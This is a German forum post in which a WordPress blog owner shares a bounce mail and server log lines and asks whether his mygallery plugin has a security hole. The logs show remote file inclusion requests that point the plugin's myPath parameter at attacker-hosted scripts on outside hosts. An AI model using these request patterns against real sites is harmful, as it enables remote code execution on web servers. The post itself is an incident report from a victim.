Sicherheitslücke in mygallery? Gelöst.
Hallo zusammen.
Entschuldigt bitte meinen etwas reißerischen Titel, aber ich hab da einen etwas seltsamen Fall, mit dem ich nicht weiterkomme.
Folgende Bounce-Mail habe ich bekommen:
This message was created automatically by mail delivery software.
A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:
r57ssh@gmail.com
SMTP error from remote mailer after RCPT TO:<r57ssh@gmail.com>:
host gmail-smtp-in.l.google.com [209.85.135.27]:
550-5.1.1 The email account that you tried to reach does not exist. Please
550-5.1.1 try double-checking the recipient's email address for typos
550-5.1.1 or unnecessary spaces. Learn more at
550 5.1.1 http://mail.google.com/support/bin/answer.py?answer=6596 e8si19146249muf.0
------ This is a copy of the message's headers. ------
Return-path: <holger@sembill.de>
Received: from nobody by wp068.webpack.hosteurope.de running ExIM using local
id 1KSDxe-0007y4-1F; Sun, 10 Aug 2008 18:40:06 +0200
To: r57ssh@gmail.com
Subject: www.auf-n-ab.de
X-PHP-Script: www.auf-n-ab.de/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php for 217.172.22.207
From: NO___=OFF_HEHE<tool@www.auf-n-ab.de>
Message-Id: <E1KSDxe-0007y4-1F@wp068.webpack.hosteurope.de>
Date: Sun, 10 Aug 2008 18:40:06 +0200
Alles anzeigen
Da ist offensichtlich eine Mail generiert worden, deren Adressat nicht existiert. Was mich wundert, sind die zurückgemailten Header-Zeilen, insbesondere die Zeile X-PHP-Script. Was bitte hat die Datei mygallerybrowser.php damit zu tun? Auch die in der From-Zeile erwähnte Mail-Adresse wird von mir gar nicht benutzt.
In den Server-Logs finde ich diesbezüglich folgende Zugriffe, hier mal ein paar Beispiel-Zeilen:
80.67.26.187 - - [05/Aug/2008:19:18:08 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 200 485 "-" "libwww-perl/5.808" "www.auf-n-ab.de"
85.57.26.164 - - [09/Aug/2008:17:58:33 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://usuarios.lycos.es/w0rms/sp.txt? HTTP/1.1" 200 1563 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.auf-n-ab.de"
217.172.29.12 - - [10/Aug/2008:02:20:48 +0200] "POST //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt?? HTTP/1.1" 200 778 "-" "libwww-perl/5.812" "www.auf-n-ab.de"
217.172.22.207 - - [10/Aug/2008:18:40:00 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt?? HTTP/1.1" 200 34029 "-" "libwww-perl/5.805" "www.auf-n-ab.de"
Leider bin ich hier mit meinem Latein am Ende und weiß nicht, ob und was ich dagegen unternehmen soll. Ist es nun eine Sicherheits-Lücke im Plug-In, wird dadurch mein Blog als Spam-Schleuder mißbraucht oder kann ich das getrost ignorieren?
Mit der Bitte um Rat und Hilfe,
Gruß Holger